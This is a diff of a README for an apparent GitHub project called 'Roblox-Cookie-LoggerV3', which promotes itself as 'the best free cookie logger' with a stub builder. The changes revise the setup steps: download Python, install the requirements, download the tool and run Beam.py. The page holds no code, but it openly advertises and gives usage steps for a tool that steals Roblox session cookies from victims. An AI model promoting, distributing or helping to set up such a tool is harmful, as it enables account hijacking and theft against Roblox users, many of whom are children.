zbenntt/Roblox-Cookie-LoggerV3/README.md

-# This Is The Best Free Cookie Logger That Uses A Stub Builder If Your On PC Or Laptop Go Bottom Right And You Will See Releases Click To Download
+# This Is The Best Free Cookie Logger That Uses A Stub Builder.
+If Your On PC Make Sure To Download Python

 ![download](https://user-images.githubusercontent.com/108227869/177584583-e468fb2a-d8c8-4cf8-9d26-0fbc75e3bc6c.gif)

+# STEPS👣 BELOW
+Make Sure You Download These Requirments
+•
-# Go To Releases And Click V3 And Download
+After Installing The Requirments Go To Download
+Then Once Downloaded Run Open Beam.py

 # Features 🛡️
 1; Roblox Cookie Logger